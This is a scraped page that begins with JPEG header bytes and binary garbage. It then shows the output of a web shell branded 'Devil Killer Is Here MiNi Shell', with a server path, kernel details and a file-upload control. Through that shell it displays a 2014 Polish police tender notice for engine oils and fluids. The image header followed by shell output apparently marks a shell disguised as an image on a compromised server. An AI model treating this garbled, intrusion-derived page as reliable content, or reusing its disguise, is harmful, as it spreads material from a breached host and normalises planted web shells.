JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140224/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140224/64110-N-2014.html

<p class="kh_header"><b>Białystok: DOSTAWY OLEJÓW SILNIKOWYCH I PŁYNÓW EKSPLOATACYJNYCH</b><br>
<b>Numer ogłoszenia: 64110 - 2014; data zamieszczenia: 24.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Białymstoku , ul. Sienkiewicza 65, 15-003 Białystok, woj. podlaskie, tel. 85 670 31 37, faks 85 670 28 42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podlaska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY OLEJÓW SILNIKOWYCH I PŁYNÓW EKSPLOATACYJNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy olejów silnikowych i płynów eksploatacyjnych spełniających minimalne wymagania oraz w ilościach określonych szczegółowo w opisie przedmiotu zamówienia (załącznik nr 7 do Ogłoszenia). Szacunkowa wartość zamówienia (netto): 79.612,03 zł.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.21.11.00-2, 09.21.16.00-7, 09.21.16.50-2, 24.96.10.00-8.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w zakresie posiadania szczególnych uprawnień. Ocena spełniania warunku zostanie dokonana w oparciu o złożone oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 lub 6 do ogłoszenia zgodnie z formułą
spełnia/nie spełnia. W przypadku podmiotów występujących wspólnie - art. 23 ust. 1 ustawy (konsorcjum, spółka cywilna): a) dot. konsorcjum - Wykonawcy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia, jego upoważnienie musi być udokumentowane pełnomocnictwem załączonym do wniosku, podpisanym przez upełnomocnionych przedstawicieli wszystkich Wykonawców (pełnomocnictwo powinno być złożone w oryginale lub w kopii potwierdzonej za zgodność z oryginałem przez notariusza) wskazujące na podmiot uprawniony
do występowania w imieniu całego konsorcjum lub do reprezentowania ich w postępowaniu i
zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja i rozliczenia dokonywane będą wyłącznie z pełnomocnikiem ustanowionym przez Wykonawców. Zamawiający zastrzega sobie możliwość zażądania przedstawienia umowy konsorcjum przed podpisaniem umowy
o udzielenie zamówienia publicznego, regulującej współpracę Wykonawców. b) dot. spółki cywilnej -
w przypadku ustanowienia pełnomocnika do reprezentowania spółki cywilnej w postępowaniu we wniosku należy złożyć: - pełnomocnictwo wystawione przez wszystkich wspólników (w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez notariusza) wskazujące na osobę uprawnioną do występowania w imieniu spółki cywilnej lub do reprezentowania jej w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia składają jeden wniosek, przy czym: a) oświadczenie zawarte w Załączniku nr 3 do ogłoszenia, aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o
działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku o dopuszczenie do udziału w
postępowaniu oraz listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy (Załącznik nr 5 do ogłoszenia), albo oświadczenie (informację) o tym, że
Wykonawca nie należy do grupy kapitałowej (Załącznik nr 4 do ogłoszenia)- składa każdy z
Wykonawców oddzielnie. b)pozostałe dokumenty, jeśli są wymagane, oceniane będą łącznie dla całego konsorcjum/spółki cywilnej. Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w zakresie posiadania wiedzy i doświadczenia.
Ocena spełniania warunku zostanie dokonana w oparciu o złożone oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 lub 6 do ogłoszenia, zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w zakresie dysponowania potencjałem
technicznym. Ocena spełniania warunku zostanie dokonana w oparciu o złożone oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 lub 6 do ogłoszenia, zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w zakresie dysponowania osobami zdolnymi do
wykonania zamówienia. Ocena spełniania warunku zostanie dokonana w oparciu o złożone oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 lub 6 do ogłoszenia, zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku dotyczącego sytuacji ekonomicznej i finansowej.
Ocena spełniania warunku zostanie dokonana w oparciu o złożone oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 lub 6 do ogłoszenia, zgodnie z formułą
spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić
zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
UWAGA! W celu zachowania formy pisemnej dokument ten powinien być własnoręcznie podpisany przez te podmioty trzecie i złożony w oryginale. Zobowiązania podmiotów trzecich do udostępnienia zasobów, złożone w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę, nie
spełniają wymogu formy pisemnej. W przypadku zmiany albo rezygnacji z podmiotu (podwykonawcy)
na zasoby, którego powołuje się wykonawca w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, w trakcie realizacji zamówienia, wykonawca będzie obowiązany wykazać zamawiającemu, że proponowany inny podmiot (podwykonawca) lub wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonywania istotnych zmian postanowień zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
2. Zmiana postanowień zawartej umowy w stosunku do treści oferty możliwa jest w następujących przypadkach i na zasadach poniżej określonych:
a)	W przypadku zaniechania produkcji przedmiotu umowy lub wystąpienia innych okoliczności niezależnych od WYKONAWCY skutkujących tym, że dostarczenie przedmiotu umowy stało się niemożliwe, ZAMAWIAJĄCY dopuszcza dostarczenie produktu równoważnego - przy czym jego jakość, parametry funkcjonalne oraz techniczne nie mogą być mniejsze (gorsze), niż te określone przez ZAMAWIAJĄCEGO - oraz zmianę terminu realizacji zamówienia o czas niezbędny na usunięcie przeszkody w jego realizacji. W takim przypadku WYKONAWCA składa pisemny wniosek wraz z uzasadnieniem do ZAMAWIAJĄCEGO w celu jego akceptacji. Cena produktu równoważnego nie może być wyższa niż cena zawarta w załączniku nr 1 do umowy;
b)	W przypadku wystąpienia innych okoliczności niezależnych od woli stron, których nie można było przewidzieć, a w wyniku których spełnienie świadczenia w terminach określonych w umowie okazało się niemożliwe, dopuszcza się możliwość zmiany terminu realizacji zamówienia o czas niezbędny na usunięcie przeszkody w jego realizacji na wniosek WYKONAWCY zaakceptowany przez ZAMAWIAJĄCEGO;
c)	Zmiany  wynagrodzenia WYKONAWCY możliwe są jedynie w przypadku zmiany wysokości stawki podatku VAT. Ceny jednostkowe brutto mogą ulec zwiększeniu lub zmniejszeniu jedynie o wartość różnicy pomiędzy obowiązującą stawką podatku VAT w momencie zawierania umowy a obowiązującą stawką podatku VAT w momencie dostawy produktów;
d)	W przypadku niewykorzystania olejów silnikowych i płynów eksploatacyjnych w ilościach określonych w § 1 ust. 1, z zastrzeżeniem § 1 ust. 5 umowy, ZAMAWIAJĄCY dopuszcza zmianę terminu umowy, o którym mowa w § 12, jednak nie dłużej niż do 31.05.2015 r.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl/contest/view/sid/L-53-2014</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.podlaska.policja.gov.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Komputer PC z systemem operacyjnym Windows/Linux oraz przeglądarka internetowa Internet Explorer 6.0 lub wyższa lub Firefox 2.0 lub wyższa. 2. Wykonawcy chcący wziąć udział w przedmiotowej licytacji są obowiązani do dokonania uprzedniej rejestracji na platformie licytacji elektronicznych: https://licytacje.uzp.gov.pl/index.php, chyba że są już zarejestrowanymi
użytkownikami platformy. UWAGA: nie jest wymagany podpis elektroniczny. 3. Wykonawca, aby umożliwić zamawiającemu dopuszczenie go do udziału w licytacji, winien zarejestrować się w systemie przed wysłaniem wniosku o dopuszczenie do udziału w licytacji, a wraz z ww. wnioskiem winien przekazać zamawiającemu informację o swoim loginie. Login winien być przekazany
Zamawiającemu w oryginalnej pisowni tzn. z zachowaniem dużych i małych liter, numerów, spacji itp. 4. Login Wykonawca otrzyma po zalogowaniu się na platformie licytacji elektronicznych. 5. Zamawiający dopuści do udziału w licytacji elektronicznej tych Wykonawców, którzy spełniają warunki udziału w postępowaniu. Zaproszenie zostanie wysłane drogą elektroniczną na adres e-mail wskazany we wniosku o dopuszczenie do udziału w licytacji elektronicznej.</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. W toku licytacji Wykonawcy składają korzystniejsze postąpienia. 2. Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia. 3. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złoży ofertę korzystniejszą pod względem ceny. 4. W toku licytacji Wykonawca
podaje kwoty brutto wyrażone w złotych polskich do dwóch miejsc po przecinku (grosze należy oddzielić od złotych kropką). 5. Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 6. W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie informował Wykonawców o pozycji złożonych przez nich ofert, a także o cenach złożonych ofert z tym, że do momentu zamknięcia licytacji Zamawiający nie ujawni informacji dotyczących ich identyfikacji. 7. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto za dostawę wszystkich określonych w opisie przedmiotu zamówienia olejów silnikowych i płynów eksploatacyjnych. 8. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza przedstawi Zamawiającemu przed zawarciem umowy wypełniony szczegółowy formularz ofertowy. Wypełniony i podpisany formularz ofertowy (zgodny ze wzorem
stanowiącym załącznik nr 8 do ogłoszenia) stanowić będzie załącznik do umowy. Wartość przedmiotu umowy wskazana w formularzu musi być tożsama z ceną najkorzystniejszej oferty tego Wykonawcy. 9. Zamawiający do momentu rozpoczęcia licytacji na platformie UZP będzie porozumiewał się z Wykonawcami przekazując oświadczenia, wnioski, zawiadomienia, wezwania do uzupełnienia dokumentów oraz inne informacje w formie faksu (nr faksu Zamawiającego: 85 670 28 42) lub pisemnie. 10. Zamawiający informuje, iż Wykonawca, który nie wykaże spełniania warunków udziału w postępowaniu nie zostanie dopuszczony do udziału w licytacji elektronicznej. 11. Zamawiający określił kwotę wywoławczą brutto za dostawę olejów silnikowych i płynów eksploatacyjnych określonych szczegółowo w opisie przedmiotu zamówienia - 97.922,80 zł brutto. 12. Minimalna wysokość postąpienia wynosi: 300,00 zł. 13. Bezpośrednio po zamknięciu licytacji elektronicznej Zamawiający poda na stronie internetowej: www.podlaska.policja.gov.pl nazwę (firmę) oraz adres Wykonawcy, którego ofertę wybrano.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 1 godzina</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 04.03.2014 godzina 15:00, miejsce: Komenda Wojewódzka Policji w Białymstoku, ul. Sienkiewicza 65, 15-003 Białystok, pokój nr 220 Zespół ds. Zamówień Publicznych.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni po terminie przekazania zaproszeń, o godz. 10.00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Upływa w dniu otwarcia licytacji o godz. 11.00</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zamawiający nie wymaga wpłaty zabezpieczenia należytego wykonania umowy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>1.	Przedmiotem umowy jest dostawa olejów silnikowych i płynów eksploatacyjnych w specyfikacji, rodzajach i ilościach określonych w  szczegółowym formularzu ofertowym stanowiącym załącznik nr 1 do umowy. 
2.	Strony ustalają całkowite wynagrodzenie WYKONAWCY za realizację przedmiotu umowy w wysokości ___ zł brutto zgodnie ze złożoną w toku licytacji ofertą.
3.	WYKONAWCA zobowiązuje się do stosowania cen jednostkowych brutto zgodnie ze szczegółowym formularzem ofertowym, o którym mowa w ust. 1. Szczegółowy formularz ofertowy - zgodny ze złożoną w toku licytacji ofertą - zostanie przedstawiony ZAMAWIAJĄCEMU przed zawarciem umowy. Zaoferowane ceny jednostkowe są stałe i nie mogą ulec zmianie przez cały okres obowiązywania umowy z zastrzeżeniem § 9 ust. 2 lit. c) wzoru umowy.
4.	Z uwagi na konieczność zakupu olejów silnikowych i płynów eksploatacyjnych według faktycznych potrzeb, które mogą wyniknąć w trakcie obowiązywania umowy, zależnych od ilości awarii, uszkodzeń pojazdów lub wycofania z użytkowania określonej marki pojazdów, ZAMAWIAJĄCY zastrzega, że ilości asortymentu określone w załączniku nr 1 stanowią ilości szacunkowe. ZAMAWIAJĄCY zastrzega sobie prawo do zmiany ilości zamawianych produktów. Niedopuszczalne jest jednak rozszerzenie rodzaju asortymentu nabywanych olejów silnikowych i płynów eksploatacyjnych oraz zwiększenie ich ilości, określonych w załączniku nr  1 do niniejszej umowy. 
5.	ZAMAWIAJĄCY zastrzega sobie możliwość zmniejszenia przedmiotu umowy max. o 40 % w stosunku do wartości, o której mowa w ust. 2, a WYKONAWCY nie przysługują z tego tytułu żadne roszczenia finansowe wobec ZAMAWIAJĄCEGO.
6.	WYKONAWCA gwarantuje ciągłość dostaw oraz jakość produktów zgodną ze złożonym formularzem ofertowym (tj. m. in. klasą lepkościową i jakościową). Wykonawca do każdej dostawy dołączy aktualne świadectwo jakości dostarczonego produktu wystawione przez producenta, a w przypadku jego braku ZAMAWIAJĄCY zastrzega sobie prawo odmowy przyjęcia dostawy.
7.	Dostarczane oleje silnikowe i płyny eksploatacyjne winny być produktem oryginalnym, tzn. winny być wytwarzane przez producenta będącego właścicielem ich receptury oraz nazw i znaków towarowych stosowanych do ich oznaczenia, a baza olejowa wykorzystywana do produkcji oferowanych olejów nie może być w żadnej części po regeneracji.
8.	Zamówione oleje silnikowe i płyny eksploatacyjne dostarczane będą w opakowaniach o pojemności wskazanej w załączniku nr 1 do niniejszej umowy. Opakowanie winno być fabrycznie napełnione i zabezpieczone oraz stosownie oznakowane (m.in. pełną nazwą wyrobu, pełną nazwą producenta, datą produkcji); a także powinno posiadać zabezpieczenia, np. plomby ze znakami producenta.
9.	Strony ustalają, że każda partia dostarczonych olejów silnikowych i płynów eksploatacyjnych, będzie spełniać wszelkie wymagania techniczne z zakresu ochrony środowiska i bezpieczeństwa w użytkowaniu określone w normach prawa publicznego obowiązujących na terenie Polski i UE.
10.	Dostarczone produkty muszą pochodzić wyłącznie z bieżącej produkcji (tzn. data produkcji nie może być wcześniejsza niż 6 miesięcy przed datą dostawy) i charakteryzować się gwarantowaną trwałością (okresem przechowywania do chwili zastosowania) nie krótszą niż 12 miesięcy od daty dostawy.
11. Dostawy produktów realizowane będą sukcesywnie transportem WYKONAWCY (na jego koszt i ryzyko), w ilościach zgłaszanych przez ZAMAWIAJĄCEGO. 
12. WYKONAWCA będzie realizował zamówienia składane przez ZAMAWIAJĄCEGO telefonicznie, faksem lub e-mailem w terminie do 3 dni roboczych (za dni robocze uważa się dni: od poniedziałku do piątku od godz. 7:30 do 15:00) od daty otrzymania zamówienia. O terminie realizacji dostawy WYKONAWCA ma obowiązek zawiadomić ZAMAWIAJĄCEGO  nie później niż 24 godziny przed planowaną dostawą. 
13. Oleje silnikowe i płyny eksploatacyjne dostarczane będą do wymienionych poniżej magazynów na terenie województwa podlaskiego:
- Stacji Obsługi WT KWP w Białymstoku: ul. Hajnowska 8/10, 15-854 Białystok; - Stacji Obsługi KMP w Suwałkach: ul. Przytorowa 9F, 16-400 Suwałki;  - Stacji Obsługi KMP w Łomży: ul. Wojska Polskiego 9, 18-400 Łomża.
14. Zamówienie będzie określało miejsce dostawy, rodzaj zamawianych produktów oraz ich ilość. 
15. ZAMAWIAJĄCY zastrzega sobie prawo odmowy przyjęcia dostawy niezgodnej ze złożonym zamówieniem lub niespełniającym wymagań.
16. W przypadku dostarczenia olejów silnikowych i płynów eksploatacyjnych niezgodnych z zamówieniem WYKONAWCA wymieni produkty na właściwe max. w terminie do 2 dni roboczych od dnia zgłoszenia reklamacji (faksem lub w innej formie). Za dni robocze uważa się dni: od poniedziałku do piątku od godz. 7:30 do 15:00.
